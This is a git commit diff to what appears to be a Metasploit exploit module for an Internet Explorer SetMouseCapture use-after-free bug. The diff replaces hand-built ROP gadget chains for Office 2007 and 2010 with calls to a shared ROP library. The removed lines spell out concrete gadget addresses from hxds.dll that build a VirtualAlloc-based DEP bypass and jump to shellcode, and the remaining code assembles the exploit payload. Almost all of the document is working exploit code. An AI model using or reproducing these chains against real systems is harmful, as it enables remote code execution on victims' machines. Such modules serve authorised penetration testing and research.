Use RopDB

2013-10-01 13:23:09 -05:00 · 2013-10-01 13:23:09 -05:00 · ed82be6fd8
parent 981212a034
commit ed82be6fd8
1 changed files with 12 additions and 60 deletions
--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
@ -117,82 +118,33 @@ class Metasploit3 < Msf::Exploit::Remote
  def get_payload(rop_dll)
    code = payload.encoded
    rop  = ''
-    p    = ''
+    alignment = ''

    case rop_dll
    when :office2007
-      rop = 
+      alignment =
      [
        junk,        # Alignment
-        0x51c46f91,  # POP EBP # RETN [hxds.dll] 
-        0x51c46f91,  # skip 4 bytes [hxds.dll]
-        0x51c35a4d,  # POP EBX # RETN [hxds.dll] 
-        0xffffffff,
-        0x51bd90fd,  # INC EBX # RETN [hxds.dll]
-        0x51bd90fd,  # INC EBX # RETN [hxds.dll]
-        0x51bfa98e,  # POP EDX # RETN [hxds.dll] 
-        0xffffefff,
-        0x51c08b65,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51c1df88,  # NEG EAX # RETN [hxds.dll]
-        0x51c55c45,  # DEC EAX, RETN [hxds.dll]
-        0x51c08b65,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51c4c17c,  # POP ECX # RETN [hxds.dll]
-        0xffffffc0,
-        0x51bfbaae,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51c1df88,  # NEG EAX # RETN [hxds.dll]
-        0x51bfbaae,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51c05766,  # POP EDI # RETN [hxds.dll] 
-        0x51bfbaaf,  # RETN (ROP NOP) [hxds.dll]
-        0x51c2e77d,  # POP ESI # RETN [hxds.dll] 
-        0x51bfc840,  # JMP [EAX] [hxds.dll]
-        0x51c05266,  # POP EAX # RETN [hxds.dll] 
-        0x51bd115c,  # ptr to &VirtualAlloc() [IAT hxds.dll]
-        0x51bdf91f,  # PUSHAD # RETN [hxds.dll] 
-        0x51c4a9f3,  # ptr to 'jmp esp' [hxds.dll]
-     ].pack("V*")
+      ].pack("V*")
+
+      rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })

    when :office2010
-      rop = 
+      alignment =
      [
        # 4 dword junks due to the add esp in stack pivot
        junk,
        junk,
        junk,
        junk,
-        0x51c41953,  # POP EBP # RETN [hxds.dll]
-        0x51be3a03,  # RETN (ROP NOP) [hxds.dll]
-        0x51c41953,  # skip 4 bytes [hxds.dll]
-        0x51c4486d,  # POP EBX # RETN [hxds.dll] 
-        0xffffffff,
-        0x51c392d8,  # EXCHG EAX, EBX # RETN [hxds.dll]
-        0x51bd1a77,  # INC EAX # RETN [hxds.dll]
-        0x51bd1a77,  # INC EAX # RETN [hxds.dll]
-        0x51c392d8,  # EXCHG EAX, EBX # RETN [hxds.dll]
-        0x51bfa298,  # POP EDX # RETN [hxds.dll] 
-        0xffffefff,
-        0x51bea84d,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51bf5188,  # NEG EAX # POP ESI # RETN [hxds.dll]
-        junk,
-        0x51bd5382,  # DEC EAX # RETN [hxds.dll]
-        0x51bea84d,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51c1f094,  # POP ECX # RETN [hxds.dll] 
-        0xffffffc0,
-        0x51be5986,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51bf5188,  # NEG EAX # POP ESI # RETN [hxds.dll]
-        junk,
-        0x51be5986,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51bf1ff0,  # POP EDI # RETN [hxds.dll] 
-        0x51bd5383,  # RETN (ROP NOP) [hxds.dll]
-        0x51c07c8b,  # POP ESI # RETN [hxds.dll] 
-        0x51bfc7cb,  # JMP [EAX] [hxds.dll]
-        0x51c44707,  # POP EAX # RETN [hxds.dll] 
-        0x51bd10bc,  # ptr to &VirtualAlloc() [IAT hxds.dll]
-        0x51c3604e,  # PUSHAD # RETN [hxds.dll] 
-        0x51c541ef,  # ptr to 'jmp esp' [hxds.dll]
+        0x51bf518b, # ret
+        junk # due to the ret 4 on the stack pivot
      ].pack("V*")
+
+      rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
    end

-    p = rop + code
+    p = alignment + rop + code
    p
  end